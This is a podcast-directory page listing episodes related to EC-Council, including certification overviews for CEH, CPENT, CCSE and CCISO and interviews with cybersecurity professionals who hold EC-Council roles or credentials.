Podcasts about ec council

engaging module reconnaissance ec council

Play Episode Listen Later Apr 11, 2024 4:32

Footprinting serves as the initial phase in assessing the security status of a target organization's IT infrastructure. Engaging in footprinting and reconnaissance activities can collect extensive information about a computer system, network, and any connected devices. Footprinting creates a detailed security profile for an organization and should be carried out systematically. What is Footprinting? Footprinting is the first step of any attack on an information system in which attackers collect information about a target network to identify various ways to intrude into the system or network. View More: Exploring Module 02 of EC Council's CEH: Footprinting and Reconnaissance

Exploring Module 01 of EC Council's CEH: Introduction to Ethical Hacking

module ceh ethical hacking ec council

Play Episode Listen Later Apr 10, 2024 4:58

The EC-Council's Certified Ethical Hacker (CEH) certification is a prestigious credential in the field of information security, specifically focusing on ethical hacking. This certification program aims to offer an in-depth knowledge of identifying weaknesses and vulnerabilities in IT systems, adopting the viewpoint of a malicious hacker, yet doing it legally and legitimately. This certification program trains individuals in the advanced step-by-step methodologies that hackers use, such as writing virus codes and reverse engineering, to better protect corporate infrastructure from data breaches. Held in high regard in the IT security industry, the CEH certification encompasses various modules, each focusing on different aspects of information security. A pivotal part of this certification program is the first module, “Introduction to Ethical Hacking.” This article explores the key topics addressed in Module 1 of the CEH certification exam, providing insight into its importance and scope within the broader context of ethical hacking and cybersecurity. Module 1: Introduction to Ethical Hacking Let us start exploring the first module, “Introduction to Ethical Hacking” of the CEH certification exam by examining the contents of this module. View More: Exploring Module 01 of EC Council's CEH: Introduction to Ethical Hacking

日本人初、GSX 小林浩史氏「EC-COUNCIL Instructor Circle of Excellence」受賞

ScanNetSecurity 最新セキュリティ情報

Play Episode Listen Later Apr 3, 2024 0:15

　グローバルセキュリティエキスパート株式会社（GSX）は3月29日、同社コンサルティング本部教育事業部の小林浩史氏の「EC-COUNCIL Instructor Circle of Excellence」受賞を発表した。

excellence circle instructors gsx ec council

Tips to Follow while Preparing for the CPENT Exam

Play Episode Listen Later Nov 28, 2023 5:34

What is the CPENT Exam? EC-Council's Certified Penetration Tester (CPENT) is an advanced-level cybersecurity credential for experienced security experts and ethical hackers who wish to enhance and assess their penetration testing abilities and skills. This certification aids in performing the thorough evaluations needed to efficiently detect and reduce security risks to computer systems, networks, and infrastructures. It will teach you how to conduct successful penetration testing in a network environment designed for businesses that must be targeted, exploited, avoided, and protected. The certification will assist in understanding how to do penetration testing on modern businesses' networks, including IoT and OT systems. You will learn how to perform advanced Windows attacks, bypass filtered networks, write your own exploits, single and double pivoting, conduct binary exploitation and advanced privilege escalation, customize scripts, and more. The CPENT certification exam is fully practical, conducted online, and remotely proctored. View More: Tips to Follow while Preparing for the CPENT Exam

preparing windows ot iot exam ec council

Introduction to Threat Intelligence | Decoding Cyber Threats | Lifecycle of Threat Intelligence

Play Episode Listen Later Sep 8, 2023 80:48

Welcome to our insightful Podcast on the foundations of Threat Intelligence and the crucial role it plays in decoding cyber threats. In this comprehensive guide, we will explore the lifecycle of Threat Intelligence, from collection to analysis and dissemination, empowering you with a deeper understanding of this vital cybersecurity discipline.

telegram roles decoding lifecycle cyber threats threat intelligence ec council view more

Breaking Through the Cloud Security Skills Gap with EC-Council's CCSE

Play Episode Listen Later Aug 31, 2023 4:48

Today, the world is adopting the cloud for all their business operations and even personal purposes. With the technology's dynamic nature, the career scope in cloud computing is rapidly expanding, resulting in a strong demand for individuals with the skills to satisfy the ever-increasing demand. Professionals who can assist these firms in securing their data and applications in the cloud are also required. Therefore, there is an enormous demand for cloud security experts in the industry. Cloud security positions are expected to be among the most prominent roles available to any cybersecurity expert in the coming years. View More: Breaking Through the Cloud Security Skills Gap with EC-Council's CCSE

cloud professionals cloud security skills gap ec council ccse

CompTIA PenTest+ vs. EC Council's CEH

ceh comptia pentest ec council

Play Episode Listen Later Jul 12, 2023 5:24

CompTIA PenTest+ and EC Council's CEH are intermediate-level certifications validating offensive security skills. The content of these certifications looks similar and makes it difficult to decide which one to choose as a career path. We have crafted an in-depth article that explores the key differences between PenTest+ and CEH certifications to help you make an informed decision. Gain valuable insights from this comprehensive guide and discover which certification aligns better with your professional aspirations in the field of cybersecurity. What is CompTIA's PenTest+ Certification? CompTIA PenTest+ certification is designed for cybersecurity professionals responsible for identifying, exploiting, managing, and reporting vulnerabilities by performing penetration testing and vulnerability assessment on the organization's network. It mainly focuses on the offensive security skills required to conduct comprehensive penetration testing. This certification helps to achieve an in-depth understanding of penetration testing objectives such as: View More: CompTIA PenTest+ vs. EC Council's CEH

The Importance of Home Labs and Not Comparing Yourself to Others with InfoSec Pat | Hacking Your Potential Podcast with Frankie Thomas

ITSPmagazine | Technology. Cybersecurity. Society

Play Episode Listen Later Jun 20, 2023 77:19

Guest: Patrick Gorman, AKA InfoSec Pat, Director of Offensive Security at Cloud Computing ConceptsOn Twitter | https://twitter.com/InfosecpatOn LinkedIn | https://www.linkedin.com/in/infosecpat/On YouTube | https://www.youtube.com/c/InfoSecPatHost: Frankie ThomasOn ITSPmagazine

Cybersecurity, Risks, and Why Your Company Needs a vCISO With New Oceans Enterprises Donna Gallaher

She Said Privacy/He Said Security

Play Episode Listen Later Jun 15, 2023 35:44

Donna Gallaher is the President and CEO of New Oceans Enterprises. New Oceans Enterprises is a Cyber, IT, and Operational Risk Management Advisory Service that facilitates collaboration among your company's business units to develop policies and operational risk mitigation strategies appropriate for your risk tolerance. Donna was recently recognized as one of the top 12 vCISO Influencers to watch and inducted into EC Council's 2023 C|CISO Hall of Fame. Donna currently serves on the Board of Advisors for the FAIR Institute and is President of the Atlanta FAIR Chapter. She is one of the founding members of vCISO Catalyst, a professional association for vCISOs. She holds CISSP, CCISO, CIPP/E, CIPM and ITIL, and Open FAIR certifications and is designated a Fellow of Information Privacy by IAPP. She is a graduate of Auburn University with a Bachelor of Science in Electrical Engineering. In this episode… In this age of technology, it's wise for companies to have some sort of cybersecurity expert on staff to protect the organization's data from theft and damage. But what happens if you're a startup or small company and unable to afford a full-time expert? Or perhaps you're a larger corporation with cyber technology in need of updating? Whatever your company's needs are, you may want to enlist the services of someone like Donna Gallaher, a securities strategist who owns a securities advisory firm that contracts out services. Firms like Donna's can provide a list of options to protect your company's data, intellectual property, and assets. Tune in to this informative episode of the She Said Privacy/He Said Security Podcast as Jodi and Justin Daniels welcome Donna Gallaher, President and CEO of New Oceans Enterprises, to discuss the role of a CISO. Donna explains the services a CISO offers, why smaller companies are prime targets for hackers, and how to prevent cybersecurity threats.

What's new in C|EH v12?

Play Episode Listen Later Nov 7, 2022 5:23

New and cutting-edge technology now dominates the planet. Information security is one of the most important aspects of today's cutting-edge technology. As the amount of data grows daily, hackers target it with various harmful intentions, but certified Ethical Hackers within the organization are there to prevent these data breaches. What is C|EH v12? The threat in the internet world will continue to increase. Therefore, there is a surge in the requirement for professionals like Ethical Hackers capable of preventing cyber threats and attacks in organizations worldwide. A Certified Ethical Hacker (C|EH) is a fully trained professional who knows and understands how to look for vulnerabilities and gaps in the target network. C|EH certification prepares individuals to find vulnerabilities in the target organization's systems by using the information and tools used by malicious attackers. C|EH has been the best ethical hacking certification in the world for 20 years, and different companies continue to rank it as the best. EC-Council launched the new C|EH v12, the latest version of the C|EH program, on September 7, 2022. The updated learning framework includes an extensive training program to equip you for the certification exam and the most robust, in-depth, hands-on lab and practice range experience in the industry. The C|EH v12 certification will lead you to a successful career in the cybersecurity field.

ec council

Expert Masterclass Introducing CEH v12 | What is CEH? | Certified Ethical Hacker CEH v12

Play Episode Listen Later Oct 18, 2022 24:54

The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field. It has been the world's number one ethical hacking certification for 20 years and is continuously ranked number one in ethical hacking certification by different firms. The EC-Council launched a new version of Certified Ethical Hacker (CEH) certification on 7th September 2022 that is CEH v12. #cehv12 #ceh #cehcertification #cehvideo #ceh v12launch #eccouncil #ethicalhacking #ethicalhackingcourse Thank you for watching this video, For more details or free demo with out expert write into us at sales@infosectrain.com ✅Agenda of the Session ✔️What is CEH? ✔️What New in CEHv12 ✔️Certify ✔️Engage ✔️Compete ✔️Select Your Course Kit Subscribe to our channel to get video updates. Hit the subscribe button above. Facebook: https://www.facebook.com/Infosectrain/ Twitter: https://twitter.com/Infosec_Train LinkedIn: https://www.linkedin.com/company/infosec-train/ Instagram: https://www.instagram.com/infosectrain/ Telegram: https://t.me/infosectrains

masterclass telegram hackers ceh certified ethical hacker ec council session what

EC-Council CCISO Domain 1: Governance, Risk, and Compliance

risk compliance governance domain ciso chief information security officer ec council

Play Episode Listen Later Aug 11, 2022 5:10

The Chief Information Security Officer, commonly known as CISO, is the top-level executive in charge of an organization's data and cybersecurity needs. Chief Information Security Officers (CISO) must have a thorough understanding of IT infrastructure as well as the numerous threats that can be posed to computer systems. The CISO's primary responsibility is to implement security protocols and procedures. To become a CISO, one must pass the CCISO certification exam. EC-Council CCISO Domain 1: Governance, Risk, and Compliance

E-sports and Gaming in Education

The Board Table

Play Episode Listen Later Aug 3, 2022 41:56

Esports is a multi-million dollar industry where teams compete in online competitions against each other. In this episode of The Board Table, NCSBA Director of Board Development & Technology Ramona Powers talks with Dr. Christine Fitch, school board member in Wilson County and esports advocate, Isiah Reese, CEO at Aperion Global Institute and Blaze Fire Games and Wesley Alvarez, Director of Academics, EC-Council about esports learning and gaming possibilities for North Carolina students.

ceo director education north carolina gaming esports academics wilson county ec council

Benefits of EC-Council Certified Cloud Security Engineer (C|CSE)

Stories of Infosec Journeys - Indian Edition

Play Episode Listen Later Jul 29, 2022 5:09

Cloud technology has been a driving reason for businesses to operate effortlessly in the modern digital era. It has completely transformed how businesses operate as it is an evolution from mainframe computing to client/server deployment methods. However, from a security standpoint, the move to the cloud has created many unknown threats and concerns. Cloud security professionals attempt to secure the cloud environments. Therefore, organizations require professionals with the expertise to secure their cloud environments. The CCSE certification gives you the knowledge and hands-on experience you need to protect cloud platforms using security principles, tools, techniques, and practices. Benefits of EC-Council Certified Cloud Security Engineer (C|CSE)

benefits cloud engineers certified cloud security security engineer ec council ccse

67. Digital Evidence Collection with Robert Fried

The Investigation Game

Play Episode Listen Later May 3, 2022 36:07

In 2022, is there any investigation that will not benefit from digital evidence collection? Our guest this week, Robert Fried, is a digital forensics expert who discusses the answer to this question with Leah in addition to other digital evidence collection questions.Robert Fried is a seasoned expert and industry thought leader with over 20 years of experience in data collection and forensic investigations. As Senior Vice President and Global Head of Sandline's Forensics and Investigations practice, he leads day-to-day operations and oversees the forensic services offered to clients, including data collection, forensic analysis, expert testimony, and forensic consultation. Previously, he has held senior-level positions in digital forensic practices at global professional services firms and worked as a computer crime specialist at the National White Collar Crime Center. He has developed and instructed computer forensics and investigative training courses for federal, state, and local law enforcement agencies.Robert holds a BS and MS in Forensic Science and certificates in Law Enforcement Science, Computer Forensic Investigation, and Information Protection and Security from the University of New Haven. He serves on the Board of Advisors for the Master's in Investigations program at the University of New Haven and the Global Advisory Board for EC-Council's Computer Hacking Forensic Investigator (C|HFI) certification. Robert is a licensed professional investigator in Michigan and a licensed private investigator in New York. He is a frequent speaker at industry events, has been a guest on industry podcasts, and has been published in several professional publications. He has also authored the book Forensic Data Collections 2.0: The Guide for Defensible & Efficient Processes and contributes to PI Magazine, where he created the CyberSleuthing department and shares insightful content on topics relating to digital forensics, eDiscovery, data privacy, and cybersecurity. RESOURCES MENTIONED IN TODAY'S EPISODEOrder Robert's new book Forensic Data Collections 2.0: The Guide for Defensible & Efficient Processes on Amazon.CONNECT WITH GUEST: ROBERT FRIEDLinkedIn: @RobertFriedWebsite: www.forensicsbook.comCONNECT WITH WORKMAN FORENSICSYoutube: @WorkmanForensicsFacebook: @wforensicsTwitter: @wforensicsInstagram: @wforensicsLinkedIn: @workmanforensicsSubscribe and listen to this and more episodes of The Investigation Game on Apple Podcasts, Android, or anywhere you listen.

Stories of Infosec Journeys - In conversation with Satyavathi Divadari

Play Episode Listen Later May 2, 2022 35:13

Satyavathi has over 24 years' experience in IT and cyber security and is the go-to person for critical security projects at CyberRes, a Micro Focus line of business, and spearheads enterprise security architecture and cloud technology. She is an inventor, a thought leader, a noted speaker in international and national forums, & has been recognized as Top 10 Women in Tech Leaders in India, Top 20 Indian Women Security Influencer, Women in Tech - Chief Mentor and more. She also serves on the board of nonprofit organizations i.e., Chairman of Cloud Security Alliance, Bangalore, and Global Advisory Board Member - CTIA at EC-Council. In case you want to reach out to her, you can find her on LinkedIn - https://www.linkedin.com/in/satyad/ Twitter - @Satya_Divadari Follow "Stories of Infosec Journeys" podcast on LinkedIn - Stories of Infosec Journeys Twitter - @InfosecJourneys Instagram & Facebook - @storiesofinfosecjourneys Kindly rate the podcast on Spotify and leave a review on Apple podcast.

spotify stories conversations apple journeys bangalore infosec micro focus cloud security alliance ec council

Exploring EC-Council's Security Awareness Certification

Cyber Security For All

Play Episode Listen Later Dec 13, 2021 18:05

Website: apetech.me/social Voicemail: https://anchor.fm/apetech/message Email: letschat@apetech.me Twitter: @apetechda TikTok: @apetechda --- This episode is sponsored by · Anchor: The easiest way to make a podcast. https://anchor.fm/app --- Send in a voice message: https://anchor.fm/apetech/message Support this podcast: https://anchor.fm/apetech/support

certification security awareness ec council

Power2Protect_EP053 - Ethical Hacking, CloudIQ Cyber Security, Movies & More!

Dell Technologies Power2Protect Podcast

Play Episode Listen Later Sep 23, 2021 15:12

Today we are joined by a very special guest - Maxim Balin, Product Manager CloudIQ Cybersecurity. Maxim was just announced as one of the top 100 Ethical Hackers and a member of “Hall of Fame 2021”, according to EC-Council. Join us as we discuss ethical hacking, cyber security risks, and how customers can use CloudIQ cyber assessment to monitor and troubleshoot your infrastructure in order to make your business safer. Learn more:www.delltechnologies.com/cloudiqwww.delltechnologies.com/en-us/blog/dell-technologies-bolsters-aiops-with-cybersecurity/

movies data hall of fame security cybersecurity cyber ethical hacking ec council

Master Ji Ki Diary with Abhishek Bhattacharya: मास्टर जी की डायरी - Page 4

TeacherParv: Celebrating Learning

Play Episode Listen Later Aug 27, 2021 42:15

Abhishek Bhattacharya is a BlockChain pioneer in India. When I say he is a pioneer, there are reasons behind this designation. This boy is 26 and he has been a 3X Entrepreneur, 2x Author, Educator. He is building India's Biggest Blockchain Platform. Currently, he is leading the trendsetter- a unique start-up that works to facilitate the govt and banks in the area of agriculture. Abhishek is a Co-founder at Whrrl and was a Product Owner for the service product at Policybazaar (an Indian unicorn insurance aggregator). At Whrrl, he's building India's first Agri-Fintech Blockchain platform that can save 25-40% of farmers' income, and protect banks from millions in very regular frauds in the segment of Warehouse Receipt Finance. This integrated mega-platform is currently deployed in 1,400 warehouses across 5 states in India, has over US $500 Mn commodities tokenized on the blockchain, and over US $1 Mn digital loans dispatched to farmers and agri-businesses, with US $330 Mn committed by the partner banks to be routed via the platform. Whrrl has been incubated at IIM Ahmedabad, University of Toronto's CDL, Chiratae Innovators' Program, TheGAIN in collaboration with MeiTy, GUSEC et. al. He is a regular speaker in blockchain and has given 2-day workshops in universities, in an attempt to show students the importance of choosing blockchain as a career path. Apart from that, he has taken lectures in blockchain for 5,000+ faculty, PhDs, and students worldwide. He's an Educator with ODEM, and a visiting faculty with Amity's Post Graduate Program in Blockchain Technology and Management. He has also advised the Certified Blockchain Professional (CBP) Course by EC-Council that's present across 145 countries. Lastly, he was nominated for the "Top 50 Tech Leaders" award by InterCon Dubai. He had been invited as a Speaker at one of Europe's biggest Blockchain conferences - Decentralized 2019 in Athens, Greece; as a Speaker at The Blockchain World Forum in Shenzhen, China; and as a Panelist/Speaker with a nomination for Best Crypto Educator in GURUS Awards by Next Block Asia 2.0 in Bangkok, Thailand last year; as a panellist/judge at Govt. of India's program for startups at IIM Kashipur; and, as a Speaker at the European Digital Week and Global Technology Summit, 2020. https://www.linkedin.com/in/abhib3012/ --- Send in a voice message: https://anchor.fm/teacherparv/message

ESD 2020: Toms Pecis ir Peter Gubarevich. Tales From The Covid – Dark Side Of The Remote Work (anglų k.)

ESET Lietuva

Play Episode Listen Later Aug 26, 2021 45:06

IT infrastruktūros ir saugumo specialistas Peter yra patyręs IT saugumo specialistas, savo patirtimi noriai dalinasi įvairiuose renginiuose, mokymuose ir konferencijose. Specialistas yra įgijęs įvairius Microsoft , Cisco, EC-Council trenerio sertifikatus. Yra gavęs Microsoft MVP: Enterprise Security status apdovanojimą 2011-2017 metais. Toms Pēcis etiškas hakeris ir socialinis inžinierius | Specialistas padeda organizacijoms geriau suprasti iškylančias kibernetinio saugumo grėsmes ir kylančias rizikas dėl socialinės inžinerijos principu pagrįstų atakų. Toms noriai užsiima edukacine veikla apie IT saugumo grėsmes, dirbant ne tik su įmonių atstovais bet ir mokyklomis, vaikais.

covid-19 microsoft tales dark side cisco remote work angl yra ec council

S3E6 Cyber Security Certifications

Cyber Security Grey Beard

Play Episode Listen Later Aug 25, 2021 24:52

Discussion on cyber security certifications. Which make sense. Where to focus. How to proceed. I cover certifications from GIAC, ISC2, ISACA, EC-Council, Amazon, Microsoft, Google, CompTIA, and others. This episode discusses areas to find training and recommendations before taking certification exams. These are recommendations only and based on my opinion and experiences. Please do research before investing in any certification or training course.ISC2: https://www.isc2.org/ISACA: https://www.isaca.org/Offensive Security: https://www.offensive-security.comEC-Council: https://cert.eccouncil.org/GIAC: https://www.giac.org/GIAC Roadmap: https://www.giac.org/certifications/get-certified/roadmapAWS: https://aws.amazon.com/certification/12 MS Azure certifications https://cloudacademy.com/blog/microsoft-azure-certifications-which-is-right-for-you-and-your-team/ Google Cloud Certifications: https://cloud.google.com/certification/SANS: https://www.sans.org/Infosec Institute: https://www.infosecinstitute.com/UDEMY: https://www.udemy.com/Cloud Academy: https://cloudacademy.com/

amazon google microsoft students cybersecurity azure udemy certifications career growth information security comptia isaca offensive security isc2 giac ec council infosec institute

Avoiding Ransomware Attacks in Businesses of All Sizes

She Said Privacy/He Said Security

Play Episode Listen Later Jul 15, 2021 34:10

Matthew Rosenquist is the Chief Information Security Officer at Eclipz, a cybersecurity innovator that develops, distributes, and deploys new technology services that secure sensitive data in transit. He also serves in advisory positions on the boards of many esteemed organizations, including the World Business Angels Investment Forum, the Private Directors Association, EC-Council, and many others. In addition to this, Matthew hosts the YouTube show, Cybersecurity Insights, where he talks about all things cybersecurity to help viewers protect themselves and their companies from common risks and attacks. In this episode… Are you intimidated by the constant news about large-scale ransomware attacks, data breaches, and other cyber risks? Do you want to protect yourself and your company — but don't quite know where to start? Recent ransomware attacks — such as the SolarWinds data breach — have brought the importance of cybersecurity and data privacy to the immediate attention of companies all over the world. Because of this, cybersecurity is changing from a personal consideration to a national conversation. Tech gurus are no longer the only privacy and security experts; now, businesses of all sizes are beginning to prioritize cybersecurity and data privacy at all costs. So, where should you start when it comes to shielding your business from common cyber risks and attacks? In this episode of She Said Privacy/He Said Security, Jodi and Justin Daniels sit down with Matthew Rosenquist, the Chief Information Security Officer at Eclipz, to discuss the importance of protecting your company from dangerous ransomware attacks. Listen in as Matthew talks about the recent cyber attacks that are taking over national headlines, the pros and cons of regulation and litigation, and the personal privacy strategy that will help you protect your data today. Stay tuned!

tech businesses sizes solarwinds chief information security officer ransomware attacks cybersecurity insights ec council matthew rosenquist

10: People Of Tech: Philip Blake

Tech Demand Weekly!

Play Episode Listen Later May 24, 2021 42:27

On this episode of People of Tech, Charles is joined by Philip Blake, the Country Manager (UK and EU) of EC-Council, the world's largest certification body for Ethical Hacking and Advanced Information Security Training. Philip has been working at EC-Council since 2016. His employers are the suppliers of cybersecurity training including leadership training courses for IT professionals. In the podcast, Philip discusses his career to date, explains more about what EC-Council provide to their customers and gives his opinion on the current threat landscape in regards to how we can protect ourselves and our organisatioOriginally published on 4/2/2019

tech european union ethical hacking ec council

Cyber Aptitude Assessment with retired Vice Admiral Jan Tighe

director navy retired cyber emerging technologies aptitude tighe vice admiral ec council

Play Episode Listen Later May 18, 2021 60:38

Host Amber Pedroncelli welcomes two guests to the show this week. First, Bryan Lopez, Director of Emerging Technologies for the Department of the Navy Chief Information Officer, discusses the interview he conducted with retired Vice Admiral Jan Tighe about cyber aptitude testing in the Navy and beyond. Vice Admiral Tighe collaborated with EC-Council on the creation of the CyberQ Aptitude Assessment.

¿Ha ayudado el covid al futuro de la educación? – #TéDigital

#TéDigital

Play Episode Listen Later May 16, 2021 45:01

¿Ha ayudado el covid al futuro de la educación? – Podcast Té Digital En el programa de hoy nos planteamos la interrogante: ¿Ha ayudado el covid al futuro de la educación?, con la ayuda del colega Ing. Marvin Soto quien tiene un currículo impresionante: Es Hacker Ético Certificado e Instructor certificado para Hacker Éticos de EC-Council. Marvin también ha sido acreditado como Experto en "Ciberseguridad y lucha contra el Cibercrimen" por la European Cybercrime y la Policía de España y como Experto en "Delitos cibernéticos contra Personas Menores de Edad" por parte de la Policía Nacional del Perú a través de Interpol, entre muchos otros aspectos en sus más de 23 años de carrera profesional. Recientemente don Marvin nos comenta que ha estado muy activo trabajando con el tema de la Educación post covid, y como la cultura informática desde el punto de vista de la Ciberseguridad es importante abordarlo. En Té Digital ya tenemos varios programas trabajando con temas relacionados a las tecnologías y la educación: Efectivamente nos hemos dado cuenta que como profesores o usuarios no estábamos preparados para esta nueva realidad. Don Marvin nos comenta que efectivamente estamos ante una nueva generación que incluso ya nació de la mano de las tecnologías, es ahí donde nos damos cuenta que quizás desde el punto de vista educativo no se tienen presentes todos los riesgos a los cuales nos enfrentamos. Randy: No solo es el reto de aprender sobre las nuevas herramientas, sino hacerlo de forma segura. (Riesgo es la mínima posibilidad de que algo con consecuencias negativas se materialice). Marvin: efectivamente mucha de la población actual es una población analógica que se ha tenido que adaptar a las nuevas tecnologías, ya incluso tenemos números donde esta industria 4.0 tiene más del 50% de las actividades o tareas automatizadas, es decir muchas de estas actividades al ser virtuales nos lleva a pensar en aquellas personas análogas, migrantes a lo digital, incluso nativos digitales o millenians no consideran los riesgos de seguridad con el fin de evitar ser víctimas de fraude. Mientras atravesamos este tiempo de pandemia y probablemente luego que pasemos la pandemia si no culturizamos o creamos conciencia en la sociedad muy probablemente los riegos se van a volver exponenciales. Nuestros hijos son muy audaces con las tecnologías, solemos decir que nacieron con ese chip, ellos tienen esa ventaja comparado con los profesores los cuales antes más allá de la pandemia quizás solo utilizan el computador para hacer exámenes, hoy con la pandemia dado este escenario se potencializan los riegos mencionados. --- Send in a voice message: https://anchor.fm/tedigital/message

Tech Corner with Renee Small & Dr Dan Schaefer - The Cyber Burnout

The CyberHub Podcast

Play Episode Listen Later Jan 22, 2021 46:38 Transcription Available

Topic: The Cyber Burnout On this week's tech corner, we take a break from technology and address Cyber Burnout the mental human side of it all. Joining the show this week are friends Renee Small and Dr Dan Schaefer to discuss how to avoid and deal with burnout, how to lead out of it and discuss the January #infosechires challenge Guest Bio: Renee's bio: I am Amazon's #1 Best Selling Author of Magnetic Hiring: Your Company's Secret Weapon to Attracting Top Cyber Security Talent (https://amzn.to/3sHM2VX). My company, a minority, woman-owned small business (MWOSB), has been awarded the Stevie Award for 2017 Female Entrepreneur of the Year. At (name of company), we build win-win strategies for companies to hire the top talent for cyber security. I co-host the Breaking Into Cybersecurity LinkedIn Live & podcast series that has over 100,000 views. Outside of running my business, I am the contributing editor for CISOMag, EC-Council's magazine targeted to CIOs, CTOs, and CISOs & the contributing editor for CyberCapital.us, Northern Virginia Technology Council's cybersecurity-focused micro-site. My proven success has come from me helping my clients win multiple hundred million dollar contracts by providing them with top, diverse talent. I'm passionate about helping CIOs, CTOs, and CISOs solve their security talent challenges and helping talented cybersecurity professionals find their next dream job. I'm fascinated by the insider threat. I'm curious as to why more companies don't leverage HR to partner with information security to prevent insider threats. I have had the unique experience to recruit and build out multiple Fortune 500 cyber security groups and to also join the security team as a program manager and lead on the security monitoring team. I use this blended experience to help leaders build amazing teams and place top security professionals in their next dream job. Dr. Dan Schaefer Bio: Dan Schaefer and Peak Performance Strategies are simply about identifying–early–anything that may get in between you and top performance. Dr. Dan works with people in business, sports & entertainment who are often, “alone at the top.” Dan is a confidential sounding-board for CEOs, entrepreneurs and groups throughout the United States, South America, Europe and Asia, advising them on people, culture and the psychology of the workplace. He has developed breakthrough strategies in sports performance for professionals: NFL, NHL Goaltenders, Major League Soccer, boxing, ultra & extreme runners, golf, tennis, skiing and amateur athletes. Consultants, sports agents, GM's and coaches also rely on Dr. Dan to get their teams performing at their best. Tech Corner is supported by these great partners please make sure to check them out: KnowBe4: https://info.knowbe4.com/phishing-security-test-cyberhub Whistic: www.whistic.com/cyberhub James Azar Host of CyberHub Podcast James on Linkedin: https://www.linkedin.com/in/james-azar-a1655316/ ****** Sign up for our newsletter with the best of CyberHub Podcast delivered to your inbox once a month: http://bit.ly/cyberhubengage-newsletter ****** Website: https://www.cyberhubpodcast.com Youtube: https://www.youtube.com/channel/UCPoU8iZfKFIsJ1gk0UrvGFw Facebook: https://www.facebook.com/CyberHubpodcast/ Linkedin: https://www.linkedin.com/company/cyberhubpodcast/ Twitter: https://twitter.com/cyberhubpodcast Instagram: https://www.instagram.com/cyberhubpodcast Listen here: https://linktr.ee/cyberhubpodcast CISO Talk Podcast: https://linktr.ee/CISOtalk The Hub of the Infosec Community. Our mission is to provide substantive and quality content that's more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.

Conversation with Dutch Schwartz

Cocktails, Code, and Conversations

Play Episode Listen Later Jan 20, 2021 51:58

This week I sit down with my buddy Dutch Scwartz and just catch upon all the things. We talk about music, security, and even Bruce Lee! And of course, we end the episode with the world-famous "Last Sip" in which we get a chance to hear what Dutch want's his legacy to be. Cocktails of the day: Old Fashioned. Meet Dutch:Dutch Schwartz has more than 20 years of experience in technology from startups to the world’s largest companies. He’s recognized as a thought leader in cybersecurity and his LinkedIn content has over 130k views in 2020. A sought-after speaker, he has been a panelist on popular podcasts including CISO Series, Security Metrics, CISOlife, CyberHub, Conversations with Dr. Cybersecurity, and the EC-Council. Having worked with more than 50 CISOs of Fortune 500 companies to create cybersecurity solutions, he understands the evolution of CISO responsibilities and the challenges which security teams face. Dutch holds a Master’s of Business Administration in Global Management and was a strategy and planning officer in the US Army. He melds his formal training with his practical experience in cybersecurity to develop cloud security strategies for customers of Amazon Web Services.

conversations master fortune dutch cybersecurity cocktails us army business administration schwartz bruce lee old fashioned amazon web services ciso cisos global management ec council ciso series

Public vs Private Blockchain | Difference Between Public and Private Blockchain

The Brand Marketing Podcast: Digital Marketing Insights & Startup Lessons

Play Episode Listen Later Dec 4, 2020 6:35

Hello and welcome to today's episode of The Brand Marketing Podcast and today, I'll be sharing with you a brief overview of public vs private blockchain, the similarities between the two, along with the difference between public and private blockchain. Watch on YouTube: Public vs Private Blockchain | Difference Between Public and Private Blockchain Recommended Video, What is Blockchain Technology and How does it work | Blockchain Explained Confused about How to become a blockchain professional? Join this top blockchain certification for beginners offered by EC-Council! Let's get social! https://twitter.com/brandlitic https://www.youtube.com/channel/UCF-uUxo43IPpnEwnR62WGlA/ https://www.instagram.com/brandlitic https://www.facebook.com/brandlitic See you in the next episode!

public private blockchain blockchain technology ec council

Sanjay Bavisi: Certified Ethical Hackers Are Not Only Pen Testers

Lessons from the School of Cyber Hard Knocks

Play Episode Listen Later Nov 23, 2020 31:30

Today's Guest: Sanjay Bavisi, President of EC-Council. In this episode, we explore how an attorney who was a technologist at heart has followed his passion to make a global impact on security.

president hackers ethical certified sanjay testers ec council

MVPbuzzChat Episode 107 with Ahmed Nabil Mahmoud

The CollabTalk Podcast

Play Episode Listen Later Oct 13, 2020 23:13

Episode 107 of the #MVPbuzzChat series. Conversation between Microsoft Regional Director and MVP Christian Buckley (@buckleyplanet), Founder & CEO of CollabTalk LLC, and Microsoft Regional Director and Cloud and Datacenter Management MVP Ahmed Nabil Mahmoud (@ITCalls_ANabil), a regional senior information security and risk manager for Standard Chartered Bank, MBA and PMP, and C|CISO advisory board member for EC-Council who is based out of UAE. Recorded in September 2020. In this episode, Ahmed and I discuss his "origin story" for the MVP and RD programs, beginning with his efforts to catalog all of his ideas and thoughts on technology through his blog, and how that expanded and opened up opportunities within information security and digital transformation. On the latter, Ahmed talks about how previously underserved communities are being transformed by technology, and how our collective community efforts play a large part in this growth and prosperity. You can find this entire episode and other MVP and RD interviews on the CollabTalk YouTube page at https://youtu.be/3gnQ6hZF6mo

ceo founders conversations mba mvp cloud uae pmp mahmoud nabil standard chartered bank microsoft regional director ec council collabtalk llc

Global CISO Forum 2020 - Keyaan Williams

director founders president africa security managing directors sr prevention americas forum centers surveillance disease control epidemiology international board cdc centers global ciso ec council

Play Episode Listen Later Aug 25, 2020 30:21

Keyaan J Williams is the Founder and Managing Director of Cyber Leadership and Strategy Solutions (CLASS-LLC), a professional services firm that helps global clients with cybersecurity strategy, program management, and workforce development. His professional experience includes two decades of support for corporate information security and risk management programs in large, regulated enterprises.Keyaan's reputation for leadership was established when he led the operational transformation of the Information Systems Security Association (ISSA) as the President of the International Board of Directors. He also served as the Sr. Manager Global Information Security with the DB Consulting Group working to build the program that standardized information security, risk management, and compliance practices across 46 country offices in Africa, Asia, and the Americas. This position stemmed from his previous service as Director Information Security (ISSO) for Centers for Disease Control and Prevention where he directed all aspects of information security, compliance, and risk management within the CDC Center for Surveillance, Epidemiology, and Laboratory Services (CSELS).Keyaan has contributed to many books and publications, including his role as a leading author of the Certified CISO Body of Knowledge used by EC-Council to train and certify thousands of global technology and security executives.Keyaan's talk at Global CISO Forum is titled Avoiding Senseless Security Metrics: A new prescription for seeing security information clearly. In Keyaan's own words: The struggle with metrics affects all business leaders who strive to measure and communicate the value of their programs and initiatives. Security metrics might be the most difficult measurements to communicate because non-technical business leaders and security executives speak completely languages. This session shines a new light onto old security measurements to help our business counterparts see the information more clearly.

Global CISO Forum 2020 - Todd Bell

Play Episode Listen Later Aug 18, 2020 26:22

